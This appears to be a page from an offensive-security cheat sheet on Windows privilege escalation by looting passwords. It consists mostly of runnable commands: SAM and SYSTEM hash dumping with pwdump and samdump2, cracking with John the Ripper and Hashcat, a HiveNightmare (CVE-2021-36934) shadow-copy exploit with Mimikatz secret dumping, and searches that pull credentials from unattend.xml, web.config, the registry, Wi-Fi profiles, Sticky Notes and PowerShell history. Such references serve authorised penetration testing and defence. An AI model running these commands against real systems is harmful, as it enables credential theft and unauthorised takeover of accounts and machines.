EoP - Looting for passwords

1. Accessing Password Hashes

1.1 Security Account Manager (SAM) and SYSTEM Files

The SAM file contains hashed passwords for user accounts, typically stored as LM or NTLM hashes.

Locations:

  • %SystemRoot%\System32\config\SAM

  • %SystemRoot%\repair\SAM

  • %SystemRoot%\System32\config\RegBack\SAM

1.2 Extracting Hashes

Using pwdump:

pwdump SYSTEM SAM > /root/sam.txt

Using samdump2:

samdump2 SYSTEM SAM -o sam.txt

1.3 Cracking Hashes

John the Ripper:

john --format=NT /root/sam.txt

Hashcat:

hashcat -m 1000 -a 0 sam.txt wordlist.txt

2. Exploiting Vulnerabilities

2.1 HiveNightmare (CVE-2021-36934)

This vulnerability allows non-administrative users to access sensitive registry hives.

Check for Vulnerability:

icacls config\SAM

Ensure BUILTIN\Users does not have read access.

Exploitation Steps:

  1. Request shadow copies:

    vssadmin list shadows

  2. Extract hives using Mimikatz:

    lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

3. LAPS (Local Administrator Password Solution) Settings

Extract LAPS Settings

Command:

reg query HKLM\Software\Policies\Microsoft Services\AdmPwd /s

Key Values to Look For:

  • AdmPwdEnabled: LAPS enabled status.

  • AdminAccountName: Name of the administrator account.

  • PasswordComplexity: Password complexity requirements.

  • PasswordLength: Required password length.

  • PwdExpirationProtectionEnabled: Expiration protection status.

4. Searching for Passwords in Files and Shares

4.1 Local File Search

Commands:

findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt

4.2 Searching in Remote Locations

  • SharePoint: Use SnaffPoint.

  • SMB Shares: Use Snaffler for automated searches.

5. Extracting Secrets with Mimikatz

Commands:

token::whoami /full
misc::shadowcopies
lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY

6. Finding Credentials in Configuration Files

6.1 Unattend.xml

Locations:

  • C:\unattend.xml

  • C:\Windows\Panther\Unattend.xml

Decode Base64 Passwords:

echo "base64_encoded_password" | base64 -d

Example Content:

<AutoLogon>
  <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=</Password>
  <Enabled>true</Enabled>
  <Username>Administrateur</Username>
</AutoLogon>

7. IIS Web Config

Command:

Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

8. Additional Sources of Passwords

8.1 Wireless Passwords

Commands:

netsh wlan show profiles
netsh wlan show profile <SSID> key=clear

8.2 Sticky Notes

Extract passwords from Sticky Notes SQLite database:

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

8.3 PowerShell History

Command:

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

8.4 Registry Searches

Commands:

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
PreviousDefault Writeable FoldersNextEoP - Incorrect permissions in services

Last updated